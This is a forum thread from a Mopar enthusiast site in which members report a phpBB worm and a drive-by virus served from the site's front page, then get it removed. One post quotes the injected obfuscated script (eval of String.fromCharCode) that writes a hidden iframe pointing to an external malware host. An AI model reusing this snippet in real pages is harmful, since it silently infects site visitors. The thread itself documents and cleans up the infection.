Just saw this and noticed that it affects the version that's running right here on moparnuts..
http://ct.enews.pcmag.com/rd/cts?d=184-1370-14-56-79216-135734-0-0-0-1
http://ct.enews.pcmag.com/rd/cts?d=184-1370-14-56-79216-135734-0-0-0-1
Worm Alert (affects the software used here on 'nuts)
- Thread starter dodgechargerfan
- Start date
onehellofadart
Yeah its fast Dumb Ass
Not good [smilie=b:
dodgedifferent2
hung like a stud field mouse and
www.thehemi.com
runs the same forums style and had a problem with a worm awhile back. I forget most of the details I would have to find that on their website with their warnings about any email from them
runs the same forums style and had a problem with a worm awhile back. I forget most of the details I would have to find that on their website with their warnings about any email from them
b-body-bob
Well-known member
Thanks DCF :beer: [smilie=b:
This is done => [url]www.phpbb.com/phpBB/viewtopic.php?t=240513[/url]
so I think we're temporarily OK.
I'm still looking into how to upgrade without losing any customizations.
This is done => [url]www.phpbb.com/phpBB/viewtopic.php?t=240513[/url]
so I think we're temporarily OK.
I'm still looking into how to upgrade without losing any customizations.
Cool.
But, unrelated (I think), I started getting a virus alert every time I come to moparnuts.
I double checked to make sure:
I cleared out my cache.
Deleted the offending file.
Went to other sites, but none that use phpBB, yet.
Checked for the file again.
Then came back here. And it's back.
I did this a few times just to make sure.
I even came directly to moparnuts without going to my home page just to make sure....
No harm done on my end, but others may not have caught it.
The file that gets downloaded is "VerifierBug.class-1a13fe05-2c31abce.idx"
The last part after the dash keeps changing everytime it gets downloaded to me.
The virus is called Java/Byte Verifier
I'm pretty sure it comes down from the forum page rather than the front portal page, but I'll do some double checking on that as soon as I get my roof fixed this afternoon.
But, unrelated (I think), I started getting a virus alert every time I come to moparnuts.
I double checked to make sure:
I cleared out my cache.
Deleted the offending file.
Went to other sites, but none that use phpBB, yet.
Checked for the file again.
Then came back here. And it's back.
I did this a few times just to make sure.
I even came directly to moparnuts without going to my home page just to make sure....
No harm done on my end, but others may not have caught it.
The file that gets downloaded is "VerifierBug.class-1a13fe05-2c31abce.idx"
The last part after the dash keeps changing everytime it gets downloaded to me.
The virus is called Java/Byte Verifier
I'm pretty sure it comes down from the forum page rather than the front portal page, but I'll do some double checking on that as soon as I get my roof fixed this afternoon.
I was wrong.
It look more like the portal page is hosed.
When I just play there I get these error messages:
Line: 7
Char: 6
Error: Syntax error
Code: 0
URL: http://www.ifrbiz.net/adverts//08/jss/installer.htm
Line: 1
Char: 1
Error: 'InjectedDuringRedirection' is undefined
Code: 0
URL: http://www.ifrbiz.net/adverts//08/jss/installer.htm
Line: 1
Char: 1
Error: Object expected
Code: 0
URL: http://www.ifrbiz.net/adverts//08/jss/redir.php
Line: 1
Char: 1
Error: Could not complete the operation due to error 80020101.
Code: 0
URL: http://www.ifrbiz.net/adverts//08/jss/installer.htm
and when I view source, I see this stuff which looks out of place...
<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97,109,101,32,98,111,114,100,101,114,61,48,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,32,115,114,99,61,39,104,116,116,112,58,47,47,105,102,114,98,105,122,46,110,101,116,47,97,100,118,101,114,116,115,47,48,56,47,49,46,112,104,112,39,62,60,47,105,102,114,97,109,101,62,34,41))</script>
I hope all of this helps... I wish I could do more to help get rid of it...
It look more like the portal page is hosed.
When I just play there I get these error messages:
Line: 7
Char: 6
Error: Syntax error
Code: 0
URL: http://www.ifrbiz.net/adverts//08/jss/installer.htm
Line: 1
Char: 1
Error: 'InjectedDuringRedirection' is undefined
Code: 0
URL: http://www.ifrbiz.net/adverts//08/jss/installer.htm
Line: 1
Char: 1
Error: Object expected
Code: 0
URL: http://www.ifrbiz.net/adverts//08/jss/redir.php
Line: 1
Char: 1
Error: Could not complete the operation due to error 80020101.
Code: 0
URL: http://www.ifrbiz.net/adverts//08/jss/installer.htm
and when I view source, I see this stuff which looks out of place...
<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97,109,101,32,98,111,114,100,101,114,61,48,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,32,115,114,99,61,39,104,116,116,112,58,47,47,105,102,114,98,105,122,46,110,101,116,47,97,100,118,101,114,116,115,47,48,56,47,49,46,112,104,112,39,62,60,47,105,102,114,97,109,101,62,34,41))</script>
I hope all of this helps... I wish I could do more to help get rid of it...
b-body-bob
Well-known member
I just got another confirmation that the byte-verify virus is on the server.
I'm as helpless to fix it as you are, it's up to the support team at our hosting company to clean it up. They have been notified.
Thanks for the help. As a reward, I'll see if I can get XL to waive your membership charges for next year. [smilie=e:
I'm as helpless to fix it as you are, it's up to the support team at our hosting company to clean it up. They have been notified.
Thanks for the help. As a reward, I'll see if I can get XL to waive your membership charges for next year. [smilie=e:
WWEEEEEEEE!!!!
I'm FREEEEEEE!!!!!!
I'm FREEEEEEE!!!!!!
b-body-bob
Well-known member
Just got this reply from the hosting company:
Now I've gotta badger the guy to find out what "solved soon" means.
Now I've gotta badger the guy to find out what "solved soon" means.
If we can get every one to use this link
http://moparnuts.com/forums/index.php
rather than just http://moparnuts.com/
it will stop the file from being downloaded to our computers.
http://moparnuts.com/forums/index.php
rather than just http://moparnuts.com/
it will stop the file from being downloaded to our computers.
b-body-bob
Well-known member
I think it's gone (for now, the crap always comes back). It was blatantly added to the end of the index.html file, and I just edited it out.
I'm gonna write protect all the html and php files and that should help.
I'm gonna write protect all the html and php files and that should help.
That seems to have cleared it up.
Having that front page write protected is a good idea. It never changes anyway..
Having that front page write protected is a good idea. It never changes anyway..
b-body-bob
Well-known member
All the code on the site is write-protected now.
Thanks again for pointing out the problem. I never go through the front page, and so never noticed. As soon as I did, WHAM, there it was.
Thanks again for pointing out the problem. I never go through the front page, and so never noticed. As soon as I did, WHAM, there it was.